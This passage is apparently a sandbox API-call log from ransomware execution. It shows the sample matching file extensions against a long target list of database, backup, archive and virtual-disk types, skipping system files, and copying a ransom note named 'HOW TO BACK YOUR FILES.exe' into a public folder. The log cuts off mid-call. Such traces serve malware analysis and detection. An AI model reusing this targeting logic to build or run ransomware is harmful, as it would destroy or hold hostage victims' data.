(lpString1="ini", lpString2="^^^") returned 1 [0040.073] lstrlenW (lpString="abs") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.073] lstrlenW (lpString="abx") returned 3 [0040.073] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.073] lstrlenW (lpString="accdb") returned 5 [0040.073] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.073] lstrlenW (lpString="accdc") returned 5 [0040.073] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.073] lstrlenW (lpString="accde") returned 5 [0040.073] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.073] lstrlenW (lpString="accdr") returned 5 [0040.073] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.073] lstrlenW (lpString="accdt") returned 5 [0040.074] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.074] lstrlenW (lpString="accdw") returned 5 [0040.074] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.074] lstrlenW (lpString="accft") returned 5 [0040.074] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.074] lstrlenW (lpString="adb") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.074] lstrlenW (lpString="adb") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.074] lstrlenW (lpString="ade") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.074] lstrlenW (lpString="adf") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.074] lstrlenW (lpString="adn") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.074] lstrlenW (lpString="adp") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.074] lstrlenW (lpString="alf") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.074] lstrlenW (lpString="ask") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.074] lstrlenW (lpString="btr") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.074] lstrlenW (lpString="cat") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.074] lstrlenW (lpString="cdb") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.074] lstrlenW (lpString="ckp") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.074] lstrlenW (lpString="cma") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.074] lstrlenW (lpString="cpd") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.074] lstrlenW (lpString="dacpac") returned 6 [0040.074] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.074] lstrlenW (lpString="dad") returned 3 [0040.074] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.074] lstrlenW (lpString="dadiagrams") returned 10 [0040.075] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.075] lstrlenW (lpString="daschema") returned 8 [0040.075] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.075] lstrlenW (lpString="db-journal") returned 10 [0040.075] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.075] lstrlenW (lpString="db-shm") returned 6 [0040.075] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.075] lstrlenW (lpString="db-wal") returned 6 [0040.075] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.075] lstrlenW (lpString="dbc") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.075] lstrlenW (lpString="dbs") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.075] lstrlenW (lpString="dbt") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.075] lstrlenW (lpString="dbv") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.075] lstrlenW (lpString="dbx") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.075] lstrlenW (lpString="dcb") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.075] lstrlenW (lpString="dct") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.075] lstrlenW (lpString="dcx") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.075] lstrlenW (lpString="ddl") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.075] lstrlenW (lpString="dlis") returned 4 [0040.075] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.075] lstrlenW (lpString="dp1") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.075] lstrlenW (lpString="dqy") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.075] lstrlenW (lpString="dsk") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.075] lstrlenW (lpString="dsn") returned 3 [0040.075] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.075] lstrlenW (lpString="dtsx") returned 4 [0040.075] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.076] lstrlenW (lpString="dxl") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.076] lstrlenW (lpString="eco") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.076] lstrlenW (lpString="ecx") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.076] lstrlenW (lpString="edb") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.076] lstrlenW (lpString="epim") returned 4 [0040.076] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.076] lstrlenW (lpString="fcd") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.076] lstrlenW (lpString="fdb") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.076] lstrlenW (lpString="fic") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.076] lstrlenW (lpString="flexolibrary") returned 12 [0040.076] lstrlenW (lpString="fm5") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.076] lstrlenW (lpString="fmp") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.076] lstrlenW (lpString="fmp12") returned 5 [0040.076] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.076] lstrlenW (lpString="fmpsl") returned 5 [0040.076] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.076] lstrlenW (lpString="fol") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.076] lstrlenW (lpString="fp3") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.076] lstrlenW (lpString="fp4") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.076] lstrlenW (lpString="fp5") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.076] lstrlenW (lpString="fp7") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.076] lstrlenW (lpString="fpt") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.076] lstrlenW (lpString="frm") returned 3 [0040.076] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.076] lstrlenW (lpString="gdb") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.077] lstrlenW (lpString="gdb") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.077] lstrlenW (lpString="grdb") returned 4 [0040.077] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.077] lstrlenW (lpString="gwi") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.077] lstrlenW (lpString="hdb") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.077] lstrlenW (lpString="his") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.077] lstrlenW (lpString="ib") returned 2 [0040.077] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.077] lstrlenW (lpString="idb") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.077] lstrlenW (lpString="ihx") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.077] lstrlenW (lpString="itdb") returned 4 [0040.077] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.077] lstrlenW (lpString="itw") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.077] lstrlenW (lpString="jet") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.077] lstrlenW (lpString="jtx") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.077] lstrlenW (lpString="kdb") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.077] lstrlenW (lpString="kexi") returned 4 [0040.077] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.077] lstrlenW (lpString="kexic") returned 5 [0040.077] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.077] lstrlenW (lpString="kexis") returned 5 [0040.077] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.077] lstrlenW (lpString="lgc") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.077] lstrlenW (lpString="lwx") returned 3 [0040.077] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.077] lstrlenW (lpString="maf") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.078] lstrlenW (lpString="maq") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.078] lstrlenW (lpString="mar") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.078] lstrlenW (lpString="marshal") returned 7 [0040.078] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.078] lstrlenW (lpString="mas") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.078] lstrlenW (lpString="mav") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.078] lstrlenW (lpString="maw") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.078] lstrlenW (lpString="mdbhtml") returned 7 [0040.078] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.078] lstrlenW (lpString="mdn") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.078] lstrlenW (lpString="mdt") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.078] lstrlenW (lpString="mfd") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.078] lstrlenW (lpString="mpd") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.078] lstrlenW (lpString="mrg") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.078] lstrlenW (lpString="mud") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.078] lstrlenW (lpString="mwb") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.078] lstrlenW (lpString="myd") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.078] lstrlenW (lpString="ndf") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.078] lstrlenW (lpString="nnt") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.078] lstrlenW (lpString="nrmlib") returned 6 [0040.078] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.078] lstrlenW (lpString="ns2") returned 3 [0040.078] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.079] lstrlenW (lpString="ns3") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.079] lstrlenW (lpString="ns4") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.079] lstrlenW (lpString="nsf") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.079] lstrlenW (lpString="nv") returned 2 [0040.079] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.079] lstrlenW (lpString="nv2") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.079] lstrlenW (lpString="nwdb") returned 4 [0040.079] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.079] lstrlenW (lpString="nyf") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.079] lstrlenW (lpString="odb") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.079] lstrlenW (lpString="odb") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.079] lstrlenW (lpString="oqy") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.079] lstrlenW (lpString="ora") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.079] lstrlenW (lpString="orx") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.079] lstrlenW (lpString="owc") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.079] lstrlenW (lpString="p96") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.079] lstrlenW (lpString="p97") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.079] lstrlenW (lpString="pan") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.079] lstrlenW (lpString="pdb") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.079] lstrlenW (lpString="pdm") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.079] lstrlenW (lpString="pnz") returned 3 [0040.079] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.080] lstrlenW (lpString="qry") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.080] lstrlenW (lpString="qvd") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.080] lstrlenW (lpString="rbf") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.080] lstrlenW (lpString="rctd") returned 4 [0040.080] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.080] lstrlenW (lpString="rod") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.080] lstrlenW (lpString="rodx") returned 4 [0040.080] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.080] lstrlenW (lpString="rpd") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.080] lstrlenW (lpString="rsd") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0040.080] lstrlenW (lpString="sas7bdat") returned 8 [0040.080] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.080] lstrlenW (lpString="sbf") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.080] lstrlenW (lpString="scx") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.080] lstrlenW (lpString="sdb") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.080] lstrlenW (lpString="sdc") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.080] lstrlenW (lpString="sdf") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.080] lstrlenW (lpString="sis") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.080] lstrlenW (lpString="spq") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.080] lstrlenW (lpString="te") returned 2 [0040.080] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.080] lstrlenW (lpString="teacher") returned 7 [0040.080] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.080] lstrlenW (lpString="tmd") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.080] lstrlenW (lpString="tps") returned 3 [0040.080] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.081] lstrlenW (lpString="trc") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.081] lstrlenW (lpString="trc") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.081] lstrlenW (lpString="trm") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.081] lstrlenW (lpString="udb") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.081] lstrlenW (lpString="udl") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.081] lstrlenW (lpString="usr") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.081] lstrlenW (lpString="v12") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.081] lstrlenW (lpString="vis") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.081] lstrlenW (lpString="vpd") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.081] lstrlenW (lpString="vvv") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.081] lstrlenW (lpString="wdb") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.081] lstrlenW (lpString="wmdb") returned 4 [0040.081] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.081] lstrlenW (lpString="wrk") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.081] lstrlenW (lpString="xdb") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.081] lstrlenW (lpString="xld") returned 3 [0040.081] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.081] lstrlenW (lpString="xmlff") returned 5 [0040.081] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.081] FindNextFileW (in: hFindFile=0x2ccfe8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49889440, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49889440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.081] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.081] FindNextFileW (in: hFindFile=0x2ccfe8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49889440, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49889440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0040.081] FindClose (in: hFindFile=0x2ccfe8 | out: hFindFile=0x2ccfe8) returned 1 [0040.081] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2e7cd0 [0040.082] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Documents", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0040.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ccfa8 | out: hHeap=0x2b0000) returned 1 [0040.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0040.082] lstrlenW (lpString="C:\\Users\\Public\\Documents") returned 25 [0040.082] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0040.082] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.082] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Documents\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\documents\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.198] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.198] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498af5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498af5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.198] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.198] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.198] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.198] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x498af5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x498af5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.198] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.198] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.198] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.198] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.198] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.199] lstrlenW (lpString="desktop.ini") returned 11 [0040.199] lstrlenW (lpString="C:\\Users\\Public\\Documents\\*") returned 27 [0040.199] lstrcpyW (in: lpString1=0x2e2e894, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.199] lstrlenW (lpString="desktop.ini") returned 11 [0040.199] lstrlenW (lpString="Ares865") returned 7 [0040.199] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.199] lstrlenW (lpString=".dll") returned 4 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.199] lstrlenW (lpString=".lnk") returned 4 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.199] lstrlenW (lpString=".ini") returned 4 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.199] lstrlenW (lpString=".sys") returned 4 [0040.199] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.199] lstrlenW (lpString="desktop.ini") returned 11 [0040.199] lstrlenW (lpString="bak") returned 3 [0040.199] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.199] lstrlenW (lpString="ba_") returned 3 [0040.199] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.199] lstrlenW (lpString="dbb") returned 3 [0040.199] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.199] lstrlenW (lpString="vmdk") returned 4 [0040.200] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.200] lstrlenW (lpString="rar") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.200] lstrlenW (lpString="zip") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.200] lstrlenW (lpString="tgz") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.200] lstrlenW (lpString="vbox") returned 4 [0040.200] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.200] lstrlenW (lpString="vdi") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.200] lstrlenW (lpString="vhd") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.200] lstrlenW (lpString="vhdx") returned 4 [0040.200] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.200] lstrlenW (lpString="avhd") returned 4 [0040.200] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.200] lstrlenW (lpString="db") returned 2 [0040.200] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.200] lstrlenW (lpString="db2") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.200] lstrlenW (lpString="db3") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.200] lstrlenW (lpString="dbf") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.200] lstrlenW (lpString="mdf") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.200] lstrlenW (lpString="mdb") returned 3 [0040.200] lstrcmpiW (lpString1="ini", 